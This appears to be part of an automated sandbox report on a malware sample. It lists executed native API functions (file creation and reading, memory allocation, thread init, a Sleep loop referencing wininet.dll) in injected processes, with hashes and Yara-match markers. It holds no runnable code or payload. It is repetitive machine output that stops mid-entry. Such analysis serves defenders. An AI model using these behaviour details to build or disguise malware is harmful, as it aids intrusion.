0x012dfe0a
0x012dfe0f
0x012dfe17
0x012dfe1e
0x012dfe19
0x012dfe19
0x012dfe19
0x012dfe20
0x012dfe21
0x012dfe22
0x012dfe25
0x012dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012DFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012DFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012DFE01

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 9755973dc2692c324a342affc4ef7053481778fa8fd47ece74ac496acbf1182e
Instruction ID: 44578b75eefd489dd0ea1b65be253fe5a2d0157e6163d05547f4ae54bd2bf8ca
Opcode Fuzzy Hash: 9755973dc2692c324a342affc4ef7053481778fa8fd47ece74ac496acbf1182e
Instruction Fuzzy Hash: CCF0F672210202BFE7241A45DC02F33BF6AEB84B30F254314F628561D1EAA2F83087F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmmon32.exePID: 6768, Parent PID: 3688COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	701
Total number of Limit Nodes:	74

Executed Functions

Function 00B185CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00B13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00B1861D

Strings

.z`, xrefs: 00B1860D, 00B18618

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 1c2a0bddeb46ef1adb41017954a8f578cd597852df9ce82510ab8d41475c7f1c
Instruction ID: 50689f40e4f3cfea40e5c5f44e2529ddf7e7e250e53cebc09eede1394d79c711
Opcode Fuzzy Hash: 1c2a0bddeb46ef1adb41017954a8f578cd597852df9ce82510ab8d41475c7f1c
Instruction Fuzzy Hash: 970108B6205248AFCB04CF98DC95DEB37E9BF8C354F154288FA0997241D630ED518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B185D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00B13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00B1861D

Strings

.z`, xrefs: 00B1860D, 00B18618

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 8ff8847a0d13ffe6b2654fc91330c4a0b9b65423132ef74d9deb82ed7862eb4f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 79F0B2B2200208BBCB08CF88DC95EEB77EDAF8C754F158248BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B1867A Relevance: 1.5, APIs: 1, Instructions: 37
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00B13D62,5E972F65,FFFFFFFF,00B13A21,?,?,00B13D62,?,00B13A21,FFFFFFFF,5E972F65,00B13D62,?,00000000), ref: 00B186C5

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2dd9efbf1bb541154e97de16461fab44cac4a5ec6a920551223ed818cb06fb77
Instruction ID: c1ccfc1e94167b1d4e48024a6db5d7042d2b39e06535809e671b1dc324bb2ed4
Opcode Fuzzy Hash: 2dd9efbf1bb541154e97de16461fab44cac4a5ec6a920551223ed818cb06fb77
Instruction Fuzzy Hash: 69F0E7B6200108BFCB58CF89CC84DEB77A9AF8C354F018259BA0D97241D630E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B18680 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00B13D62,5E972F65,FFFFFFFF,00B13A21,?,?,00B13D62,?,00B13A21,FFFFFFFF,5E972F65,00B13D62,?,00000000), ref: 00B186C5

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: e91c3ca36d090ea0a2cfd50ced1508e5ebfc733cd172f0cd383086496180133c
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 80F0A9B2200108ABCB14DF89DC95DEB77EDAF8C754F158248BE1D97241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B186CB Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00B13D62,5E972F65,FFFFFFFF,00B13A21,?,?,00B13D62,?,00B13A21,FFFFFFFF,5E972F65,00B13D62,?,00000000), ref: 00B186C5

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f53e68a941d2eeac2a47074bb65c904a53c7e29491f20de4ec7e2b56f7827de5
Instruction ID: 1908a9d0ef411b32497d72e69b2ef08e1c1d1f36e9ae11ff35c30c78973d9f13
Opcode Fuzzy Hash: f53e68a941d2eeac2a47074bb65c904a53c7e29491f20de4ec7e2b56f7827de5
Instruction Fuzzy Hash: A0F0B7B6204149AFCB04DF99DC94DEB77E9AF8C314B198689FA4D93601C634E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B187AA Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00B02D11,00002000,00003000,00000004), ref: 00B187E9

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 73a1a94045c19f58df4410ef690d5e3aff3a91d7b6b68b370cc8d049f46b8b6e
Instruction ID: 8fc57ff43fca595ab195a7295914c2fd5cf769793708baa4eb3ab280b959f70c
Opcode Fuzzy Hash: 73a1a94045c19f58df4410ef690d5e3aff3a91d7b6b68b370cc8d049f46b8b6e
Instruction Fuzzy Hash: EBF05E71600209BFCB14CF88CC85EEB77A9AF88740F118159FD08D7241C230E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B187B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00B02D11,00002000,00003000,00000004), ref: 00B187E9

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: b50742168ba26618ae8b7ffd05c2639e541d926619b229159f343fa2ecf65430
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 58F015B2200208BBCB18DF89CC85EEB77ADAF88750F118148BE08A7241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B18700 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00B13D40,?,?,00B13D40,00000000,FFFFFFFF), ref: 00B18725

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: af8f00505d7a45498c410619a6b1b101672baf48fb301e2cdcca49b5c6a9a077
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 50D012752002147BD714EB98CC49ED7779CEF44750F154495BA189B242C570F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04A895D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A895DA

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f7b0d7a454594114ea621908c691df292faf72955a2fdd1fff7f2edebbc67d9
Instruction ID: bb61af0029e1bc83def348ebf8bb8c3fc945277298b2cebc7570b8858625b356
Opcode Fuzzy Hash: 9f7b0d7a454594114ea621908c691df292faf72955a2fdd1fff7f2edebbc67d9
Instruction Fuzzy Hash: 0E9002A120200003650571694514616408A97E0245B51C021E1005590DC565DCD17175

Uniqueness

Uniqueness Score: -1.00%

Function 04A89540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8954A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: abd85f8f77bcd86b55e22d6a1d7a0b32059179a77184ff72a669d265ea7ebbe9
Instruction ID: 5dca2501332fb431e990b4419d10820af26c584afb2342ceec0516a8bf60a730
Opcode Fuzzy Hash: abd85f8f77bcd86b55e22d6a1d7a0b32059179a77184ff72a669d265ea7ebbe9
Instruction Fuzzy Hash: 0A900265211000032505A569070450700C697D5395351C021F1006550CD661DCA16171

Uniqueness

Uniqueness Score: -1.00%

Function 04A896E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A896EA

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48fb9eda304601fdf412ecff514aeb714dab5736a3e8ecd18c7ff6eb30242e0e
Instruction ID: 8f16db1938995298ee49374cfa7e321100ad76ef98b37100d218b0647907589f
Opcode Fuzzy Hash: 48fb9eda304601fdf412ecff514aeb714dab5736a3e8ecd18c7ff6eb30242e0e
Instruction Fuzzy Hash: 1790027120108802F5106169850474A008597D0345F55C411A4415658D86D5DCD17171

Uniqueness

Uniqueness Score: -1.00%

Function 04A896D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A896DA

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 957fa895b465fdb3520c7ed34509f542af28887e6bc77fab8dc3f3d24f7292a0
Instruction ID: 409325d3c1f68e2b172d5d424c36521b07e2597d303c5f91dcb44428512cea53
Opcode Fuzzy Hash: 957fa895b465fdb3520c7ed34509f542af28887e6bc77fab8dc3f3d24f7292a0
Instruction Fuzzy Hash: C990027120100842F50061694504B46008597E0345F51C016A0115654D8655DC917571

Uniqueness

Uniqueness Score: -1.00%

Function 04A89660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8966A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c7e33f5125cd49ea34ebc95af13793ddf15d896e999256fc92ae92ee33ceef1
Instruction ID: 92fcd36962b16e25c0989cbce96d8ba3ec759994a7ae05e171a73d8f54ce972d
Opcode Fuzzy Hash: 0c7e33f5125cd49ea34ebc95af13793ddf15d896e999256fc92ae92ee33ceef1
Instruction Fuzzy Hash: B490027120100802F5807169450464A008597D1345F91C015A0016654DCA55DE9977F1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8965A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 325b07fc457f4e05ef244b03f99d171057d8e340ba9c877444f1ec5d610681ae
Instruction ID: 6b0df362fee8b8c366d2359d437c2f6043e5a2407179124b2848375c2cfbed6d
Opcode Fuzzy Hash: 325b07fc457f4e05ef244b03f99d171057d8e340ba9c877444f1ec5d610681ae
Instruction Fuzzy Hash: 5D90027120504842F54071694504A46009597D0349F51C011A0055694D9665DD95B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 04A89780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8978A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89dfe21b5af8eee5607edb7dc92e34e1f935387ad3ded1cfcfd1f5bc705c73c9
Instruction ID: 6cb1b36cd8362dc0f4e3babe42df29f8c0489997b54b438c30b7861625e748cc
Opcode Fuzzy Hash: 89dfe21b5af8eee5607edb7dc92e34e1f935387ad3ded1cfcfd1f5bc705c73c9
Instruction Fuzzy Hash: 8890026921300002F5807169550860A008597D1246F91D415A0006558CC955DCA96371

Uniqueness

Uniqueness Score: -1.00%

Function 04A89FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A89FEA

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fd3d13dfb446ddb0147f4ae4d05603ecfb66e59fc8dccbc89ecc8e3f75becf5
Instruction ID: a041621940d0fd57d02861fee57ccf5f1150bf1b64611b2637469cc1b1a9d754
Opcode Fuzzy Hash: 7fd3d13dfb446ddb0147f4ae4d05603ecfb66e59fc8dccbc89ecc8e3f75becf5
Instruction Fuzzy Hash: B090027131114402F51061698504706008597D1245F51C411A0815558D86D5DCD17172

Uniqueness

Uniqueness Score: -1.00%

Function 04A89710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8971A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9130534c68b697330188356920d7d0d8ec0a756c82cd08c8be09350cdd0b108
Instruction ID: f721fbd0606a9c7a5212fe36478eaa4eca2c2c78928d03015a8778690daf0706
Opcode Fuzzy Hash: e9130534c68b697330188356920d7d0d8ec0a756c82cd08c8be09350cdd0b108
Instruction Fuzzy Hash: F890027120100402F50065A95508646008597E0345F51D011A5015555EC6A5DCD17171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8986A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 73110dee192ec4bf816a5a9481a8e1e43744216c1ddb91203574bde2ed7d8ab6
Instruction ID: e60e32eeedd5a2215a2710479840e0b5b12d7e09bfcad8643425002d7b5b9ab1
Opcode Fuzzy Hash: 73110dee192ec4bf816a5a9481a8e1e43744216c1ddb91203574bde2ed7d8ab6
Instruction Fuzzy Hash: 5A90027120100413F51161694604707008997D0285F91C412A0415558D9696DD92B171

Uniqueness

Uniqueness Score: -1.00%

Function 04A89840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8984A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb345536716af317ece7109e92ef8e9848c3a181767799e60099f5a153dd0135
Instruction ID: 77366dfcb4caf59e6a5e53188b656c35a92e6795939b3bce6023fb7f46587660
Opcode Fuzzy Hash: cb345536716af317ece7109e92ef8e9848c3a181767799e60099f5a153dd0135
Instruction Fuzzy Hash: C8900261242041527945B16945045074086A7E0285791C012A1405950C8566EC96E671

Uniqueness

Uniqueness Score: -1.00%

Function 04A899A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A899AA

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7f31cc34e162f058f052eab5bfd0eff1123de520f069596e809942267672433
Instruction ID: 88089017f977aa3bf8a15faf88faae9305cc15d2f517b5d2f739a66306d51c87
Opcode Fuzzy Hash: c7f31cc34e162f058f052eab5bfd0eff1123de520f069596e809942267672433
Instruction Fuzzy Hash: 799002A134100442F50061694514B060085D7E1345F51C015E1055554D8659DC927176

Uniqueness

Uniqueness Score: -1.00%

Function 04A89910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A8991A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67b2ae7ce5767b15ed2802bb1bda56d8404db1783499162fafa6bc572fc33f87
Instruction ID: ab3bcba7cd84e395b5177b7577da3bd933986ecd95c6abc3b2b9fbde4587a856
Opcode Fuzzy Hash: 67b2ae7ce5767b15ed2802bb1bda56d8404db1783499162fafa6bc572fc33f87
Instruction Fuzzy Hash: B39002B120100402F54071694504746008597D0345F51C011A5055554E8699DDD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 04A89A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A89A5A

Memory Dump Source

Source File: 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000009.00000002.638588407.0000000004B3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a20000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d2fd334b75aab8b20e96f36dbcf6f2bf43ae66c602c83f1877f876ee3e8d5ca
Instruction ID: 4a8f267aabd07227a31e1df1fe67c26af1049dcc9b4cd3862b01ca16a3a76ee8
Opcode Fuzzy Hash: 8d2fd334b75aab8b20e96f36dbcf6f2bf43ae66c602c83f1877f876ee3e8d5ca
Instruction Fuzzy Hash: 0E90026121180042F60065794D14B07008597D0347F51C115A0145554CC955DCA16571

Uniqueness

Uniqueness Score: -1.00%

Function 00B172F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00B17398

Strings

net.dll, xrefs: 00B17361, 00B173E7, 00B173BF, 00B173CB, 00B173F3
wininet.dll, xrefs: 00B1734E, 00B17357

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 2e81b65d449634c3f57fbf102912e1decd0d7f59c34615b1bf4c28a56a050c20
Instruction ID: 368cf6662a3cd178542d0063d490e91f3214fa357e5cefa128e4bfc0f134e713
Opcode Fuzzy Hash: 2e81b65d449634c3f57fbf102912e1decd0d7f59c34615b1bf4c28a56a050c20
Instruction Fuzzy Hash: 4D31AEB6641600ABC711DF64D8A1FABB7F8EF48700F40815DFA1A9B241D730A486CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B172E7 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00B17398

Strings

net.dll, xrefs: 00B17361, 00B173BF, 00B173CB
wininet.dll, xrefs: 00B1734E, 00B17357

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: ee17e857edd28707626b9e22c13a3e45a5824fddf838995f634774d72189412a
Instruction ID: 9bc07f1fda1e11ac841de21a9c9088af863cf391f94bb2003b3bef482365120e
Opcode Fuzzy Hash: ee17e857edd28707626b9e22c13a3e45a5824fddf838995f634774d72189412a
Instruction Fuzzy Hash: 1E21C1B2945700ABC710DF64D8A1FABBBF4FF48700F508069FA299B241D770A586CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00B188E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00B03B93), ref: 00B1890D

Strings

.z`, xrefs: 00B188FC, 00B18908

Memory Dump Source

Source File: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b00000_cmmon32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: b5f6ac60289260c147fe7654e349a4e631f50d3788f3897d9330ba8ee35d9f3c
